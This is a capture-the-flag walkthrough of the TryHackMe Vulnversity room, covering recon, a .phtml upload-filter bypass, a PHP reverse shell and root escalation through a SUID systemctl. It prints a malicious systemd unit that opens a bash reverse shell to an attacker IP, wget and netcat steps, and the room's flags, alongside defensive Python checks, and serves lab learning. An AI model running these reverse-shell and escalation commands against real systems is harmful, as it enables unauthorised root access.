TryHackMe Vulnversity Walkthrough
This walkthrough will explore key cybersecurity concepts like reconnaissance, web application attacks, and privilege escalation. “Vulnversity” is an excellent room for beginners, as it introduces various essential tools and techniques.
Task 1: Deploy the Machine
The first task is simple — deploy the target machine by clicking the “Deploy” button on TryHackMe. This will spin up the environment we’ll be working with.
Q: Deploy the machine.
Answer: No answer needed
Task 2: Reconnaissance
Reconnaissance is crucial for any penetration test. It’s the process of gathering information about the target to identify potential vulnerabilities. We’ll use Nmap, one of the most widely used tools for network scanning.
Q: There are many Nmap “cheatsheets” online that you can use too.
Answer: No answer needed
Q: Scan the box; how many ports are open?
sudo nmap -sV -T4 10.10.112.222 -Pn
This Nmap command performs service version detection (-sV) to identify the services running on the open ports. The -T4 flag speeds up the scan by selecting a more aggressive timing template, while -Pn skips host discovery and treats the host as up (useful when ICMP probes are filtered).
Answer: 6
Q: What version of the squid proxy is running on the machine?
Answer: Squid HTTP proxy 3.5.12
Squid is a caching proxy for web traffic, often used to improve performance and security.
Q: How many ports will Nmap scan if the flag -p-400 is used?
Answer: 400
By default, Nmap scans the 1000 most common ports. The -p-400 flag restricts the scan to ports 1 through 400.
Q: What is the most likely operating system this machine is running?
Answer: Ubuntu
Nmap provides hints about the operating system from the service banners returned by -sV (for example, Apache and OpenSSH version strings on Ubuntu packages are tagged with the distribution name). In this case, Ubuntu is the likely OS.
Q: What port is the web server running on?
Answer: 3333
Q: It’s essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Answer: No answer needed
Q: What is the flag for enabling verbose mode using Nmap?
Answer: -v
Task 3: Locating Directories using Gobuster
Gobuster is a directory and file brute-forcer, used to find hidden directories on web servers. This is useful when performing web reconnaissance, as hidden paths could lead to valuable resources like login pages or upload forms.
Initially, I attempted to use Gobuster for brute-forcing hidden directories, but due to some issues with Gobuster not working properly, I switched to FFUF (Fast Web Fuzzer), which performs a similar function and is known for its speed and flexibility in directory brute-forcing.
Q: I have successfully configured Gobuster.
Answer: No answer needed
Q: What is the directory that has an upload form page?
Command for gobuster:
gobuster dir -u http://10.10.112.222:3333 -w /path/to/wordlist
Command for ffuf:
ffuf -u http://10.10.112.222:3333/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
Answer: /internal/
Task 4: Compromise the Web Server
Q: What common file type you’d want to upload to exploit the server is blocked?
Answer: .php
The upload form blocks .php files because the web server would execute an uploaded PHP script, giving an attacker arbitrary code execution and a full server compromise.
Q: I understand the Burpsuite tool and its purpose during pentesting.
Answer: No answer needed
Q: What extension is allowed after running the above exercise?
Answer: .phtml
After testing various extensions, we discovered that .phtml is allowed. This is an alternative file extension for PHP scripts that the server still executes, so the filter can be bypassed. The root cause is that the form uses a blacklist of extensions (rejecting only .php) rather than an allowlist of the file types it actually needs.
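To show why the blacklist fails and what the fix looks like, here is an added example (not code from the room or from TryHackMe): a Python recreation of the observed blacklist check next to an allowlist check that also rejects double extensions and discards the client-supplied filename. The exact server-side code of the upload form is not shown on the page, so the blacklist behaviour is an assumption based on the results above.

```python
import os
import re
import secrets

# Extension blacklist modelled on the behaviour observed in this room: only the literal
# ".php" extension is rejected (assumption: the form's real server-side code is not shown).
BLOCKED_EXTENSIONS = {".php"}

def blacklist_allows(filename):
    """Vulnerable check. Ubuntu's Apache PHP configuration typically maps .phtml (and .phar)
    to the same handler as .php, so an upload this lets through still runs as PHP."""
    _, ext = os.path.splitext(filename)
    return ext.lower() not in BLOCKED_EXTENSIONS

# Hardened check: accept only the few types the form needs, require exactly one extension
# (so "shell.php.png" and "shell.phtml" both fail) and never trust the client's name.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
STEM = re.compile(r"[a-z0-9_-]{1,64}")

def allowlist_allows(filename):
    name = os.path.basename(filename).lower()
    parts = name.split(".")
    if len(parts) != 2:
        return False
    stem, ext = parts
    return ext in ALLOWED_EXTENSIONS and STEM.fullmatch(stem) is not None

def stored_name(filename):
    """Name to store an accepted upload under: random stem plus allowlisted extension,
    so the original filename never reaches the filesystem or a URL."""
    if not allowlist_allows(filename):
        raise ValueError("rejected upload: " + filename)
    ext = os.path.basename(filename).lower().rsplit(".", 1)[1]
    return secrets.token_hex(8) + "." + ext
```

Serving the upload directory with script execution disabled (no PHP handler for that path) is the second half of the fix, since the extension check alone is one line of defence.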
Q: While completing the above exercise, I have successfully downloaded the PHP reverse shell.
To exploit the server, we download a PHP reverse shell script from PentestMonkey’s repository. This script enables us to gain a remote shell on the target machine by sending back a connection to our machine.
Once uploaded, set up a listener on your machine using netcat:
nc -lvnp 4444
After uploading the reverse shell and accessing it, we establish a connection to the server.
Q: What is the name of the user who manages the web server?
Answer: Bill
The /etc/passwd file stores user account information on Linux systems, and by inspecting this file, we discovered that there is a user named Bill who manages the web server.
Q: What is the user flag?
Answer: 8bd7992fbe8a6ad22a63361004cfcedb
The user flag is typically stored in the home directory of the compromised user. It’s a key piece of information to capture during a pentest.
Task 5: Privilege Escalation
Privilege escalation is the process of gaining higher-level privileges, typically root or administrator access, after gaining an initial foothold.
Q: On the system, search for all SUID files. Which file stands out?
find / -type f -perm -4000 -ls 2>/dev/null
-type f : Searches for regular files only.
-perm -4000 : Matches files with the SUID bit set.
-ls : Lists the details of each file found.
2>/dev/null : Suppresses error messages (such as permission-denied errors from directories we cannot read).
Answer: /bin/systemctl
This command revealed that /bin/systemctl has the SUID bit set, meaning it runs as root regardless of which user invokes it. systemctl is not SUID on a stock Ubuntu install, so this file stands out: a SUID systemctl lets an unprivileged user register and start arbitrary services as root, which is exactly what we use to escalate privileges.
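As an added example (not part of the original walkthrough), this Python snippet turns the find command above into a repeatable check: it parses `find -ls` output and reports every SUID file that is not on a baseline of binaries expected to carry SUID. The sample output and the baseline are constructed for illustration; a real baseline should be captured from a known-good image of the same Ubuntu release.

```python
# Constructed sample of `find / -type f -perm -4000 -ls` output (not captured from the
# target): a few normal Ubuntu SUID binaries plus the SUID systemctl found in this room.
SAMPLE_FIND_OUTPUT = """\
   131   40 -rwsr-xr-x   1 root     root        40128 Mar 10  2016 /bin/su
   132   44 -rwsr-xr-x   1 root     root        44680 Mar 10  2016 /bin/mount
   133  644 -rwsr-xr-x   1 root     root       659856 Feb 24  2016 /bin/systemctl
   134   56 -rwsr-xr-x   1 root     root        54256 Mar 10  2016 /usr/bin/passwd
   135  136 -rwsr-xr-x   1 root     root       136808 Jan 20  2016 /usr/bin/sudo
"""

# Illustrative baseline (assumption): binaries that legitimately carry SUID on a stock
# Ubuntu install. Capture the real list from a clean image rather than trusting this one.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
}

def parse_find_ls(output):
    """Yield (path, mode, owner) for each line of `find -ls` output.
    Fields: inode, blocks, mode, links, owner, group, size, month, day, time/year, path."""
    for line in output.splitlines():
        fields = line.split(None, 10)   # path is the 11th field and may contain spaces
        if len(fields) == 11:
            yield fields[10].rstrip(), fields[2], fields[4]

def unexpected_suid(output, baseline=EXPECTED_SUID):
    """Return (path, owner) for SUID files missing from the baseline, root-owned ones
    first, since those run as root for any caller."""
    findings = []
    for path, mode, owner in parse_find_ls(output):
        if mode[3] in "sS" and path not in baseline:   # owner-execute slot shows the SUID bit
            findings.append((path, owner))
    return sorted(findings, key=lambda f: (f[1] != "root", f[0]))
```

On a live host, pipe the real find output into unexpected_suid() and treat any hit outside the baseline as a finding to investigate.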
Q: What is the root flag value?
Step 1: Create a Malicious Service File
First, we created a malicious service file on our attacker machine. The service file contains instructions for the system to spawn a reverse shell when executed. Here’s the code we used:
[Unit]
Description=root
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/tun0_IP/4444 0>&1'
[Install]
WantedBy=multi-user.target
Step 2: Transfer the Malicious Service File to the Victim Machine
Next, we used a Python HTTP server to transfer the malicious service file to the victim machine.
First, we hosted the malicious service file (root.service) on the attacker machine:
python3 -m http.server 80
On the victim machine, we downloaded the file using wget:
wget http://10.9.243.55/root.service -O /tmp/root.service
This command retrieves the root.service file from our machine and saves it to the /tmp directory on the victim machine.
Step 3: Set Execute Permissions on the Service File
Once the file was transferred to the victim machine, we gave it execute permissions using the chmod command:
chmod +x /tmp/root.service
Step 4: Enable the Malicious Service
Next, we used the systemctl command to enable the malicious service we just created:
systemctl enable /tmp/root.service
Because the unit is given as an absolute path, enable first links the file into /etc/systemd/system/ (so systemd can refer to it by the name root) and then adds it to the multi-user.target.wants directory, which tells the system to start this service at boot.
Step 5: Start the Netcat Listener on the Attacking Machine
Before starting the malicious service, we set up a Netcat listener on the attacker machine to catch the reverse shell. This will listen for incoming connections:
nc -lvp 4444
Step 6: Start the Malicious Service
Now, we started the malicious service on the victim machine:
systemctl start root
This command executes the malicious service, which triggers the reverse shell.
Step 7: Catch the Reverse Shell
Once the service was started, we received a reverse shell connection on our attacker machine via the Netcat listener. Because the service ran as User=root, the shell we caught was already root, giving us access to sensitive directories such as /root.
Final Step: Retrieve the Root Flag
After gaining root access, we navigated to the /root directory and retrieved the root flag:
cat /root/root.txt
After exploiting the SUID file, we gain root access and can find the root flag in the /root directory.
Answer: a58ff8579f0a9270368d33a9966c7fd5
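From the defender's side, the enable step above leaves a tell-tale trace: symlinks under /etc/systemd/system that point at a unit file outside the normal unit directories (here, /tmp/root.service). The following added example (not from the walkthrough) checks for exactly that. The sample symlink list is constructed; collect_unit_links() gathers the real one from a host.

```python
import os

# Directories whose unit files come from packages or the administrator (assumption:
# the standard search path on Ubuntu; adjust for other distributions).
TRUSTED_UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system",
                     "/usr/lib/systemd/system", "/run/systemd/system")

def is_trusted_target(target):
    target = os.path.normpath(target)
    return any(target == d or target.startswith(d + os.sep) for d in TRUSTED_UNIT_DIRS)

def suspicious_unit_links(links):
    """links: iterable of (symlink_path, target_path). Return the symlinks whose
    target lives outside the trusted unit directories, e.g. a unit enabled from /tmp."""
    return sorted((link, target) for link, target in links if not is_trusted_target(target))

def collect_unit_links(root="/etc/systemd/system"):
    """Walk root and yield (symlink, absolute target) for every symlink found.
    Relative targets are resolved against the symlink's own directory."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.readlink(path)
                if not os.path.isabs(target):
                    target = os.path.join(dirpath, target)
                yield path, os.path.normpath(target)

# Constructed sample mirroring what `systemctl enable /tmp/root.service` leaves behind,
# next to a normally enabled service for comparison.
SAMPLE_LINKS = [
    ("/etc/systemd/system/multi-user.target.wants/ssh.service", "/lib/systemd/system/ssh.service"),
    ("/etc/systemd/system/root.service", "/tmp/root.service"),
    ("/etc/systemd/system/multi-user.target.wants/root.service", "/tmp/root.service"),
]
```

Run suspicious_unit_links(collect_unit_links()) on the host; removing the SUID bit from systemctl is the actual fix, and this check catches a service that was planted before the fix.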
Connect with me on LinkedIn: linkedin.com/in/raajeshmenghwar